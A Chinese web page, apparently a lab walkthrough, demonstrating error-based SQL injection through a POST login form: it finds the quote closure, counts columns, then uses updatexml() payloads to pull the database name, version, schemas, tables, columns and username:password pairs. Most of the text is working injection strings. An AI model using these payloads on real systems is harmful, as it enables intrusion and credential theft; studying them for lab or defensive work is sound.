当前位置: 首页 > news >正文

iis 多网站安全设置淘宝详情页模板

iis 多网站安全设置,淘宝详情页模板,分析公司网站的开发策略,做企业网站的费用post提交报错注入 闭合方式及注入点 利用hackbar进行注入#xff0c;构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错#xff0c;根据分析#xff0c;闭合方式. 确定列数 构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注…post提交报错注入 闭合方式及注入点 利用hackbar进行注入构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错根据分析闭合方式. 确定列数 构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注入 unameaaa order by 3 # passwdbbbSubmitSubmit 有报错 unameaaa order by 2 # passwdbbbSubmitSubmit 无报错列数2 回显位置 unameaaa union select 1,2 # passwdbbbSubmitSubmit 发现页面没有回显想到前面 存在报错想到报错注入 使用updatexml()函数来进行报错注入 查询数据库与版本等 unameaaa union select 1,updatexml(1,concat(‘~’,(select database())),3) # passwdbbbSubmitSubmit 数据库名unameaaa union select 1,updatexml(1,concat(‘~’,(select version())),3) # passwdbbbSubmitSubmit 版本 爆出所有数据库 unameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1)),3) # passwdbbbSubmitSubmit 通过修改limit函数的值来查询所有的数据库名 爆出所有表名 unameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 2,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1)),3) # passwdbbbSubmitSubmit 得到users表 爆出列名 unameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 2,1)),3) # passwdbbbSubmitSubmit 得到列id,username,password 爆出数据 unameaaa union select 1,updatexml(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1)),3) # passwdbbbSubmitSubmit 修改0的值就可以得到所有的数据 完成
http://www.yayakq.cn/news/1434/

相关文章:

  • asp.net搭建网站搭建棋牌工具
  • 文库网站开发建设seochinaz查询
  • 国外做的好的医疗网站阿里云wordpress root
  • 现在网站建设用到哪些技术wordpress右侧悬浮搜索菜单
  • 容县网站开发上海装修网站大全
  • 微企免费网站建设微信h5的制作方法
  • 免得做网站智能建设网站
  • 循化网站建设公司济宁建设工程信息网站
  • 网站建设及 维护电子产品外贸交易平台
  • 微网站免费开发平台手机优化助手怎么删除
  • 北京网站建设公司司文创产品设计作品欣赏
  • 网站撤销备案个人怎么注册公司需要多少钱
  • 网站专题页面设计欣赏wordpress网站如何app
  • 自己做的视频可以传别的网站去吗广州商务网站建设电话
  • 提供网站建设服务菜谱分享网站开发开题报告
  • 怎么制作网站布局erp软件开发
  • 外国做袜子的网站ueditor wordpress 4.5
  • HTML怎么做网站目录青岛做网站价格
  • 哪个市文化和旅游网站做的好大网站
  • 查询网站中国摄影展览网首页
  • 外贸网站建设 广州企业网站的域名是该企业的
  • 响水哪家专业做网站怎样查网站的注册地点
  • 企业做网站公司怎么样天琥设计培训学校官网
  • 芒市网站建设公司青岛有没有做网站的
  • 做网站文字编辑累吗用源码做自己的网站
  • 网站建设风景课程设计报告深圳网站设计比较好的公司有哪些
  • 网站页面优化分析网站代理浏览器一
  • 企业网站建站系统网站宣传需要多少钱
  • 做h5页面网站有哪些域名多少钱一年
  • 深圳中高端网站建设怎么样网站建设服务器 几核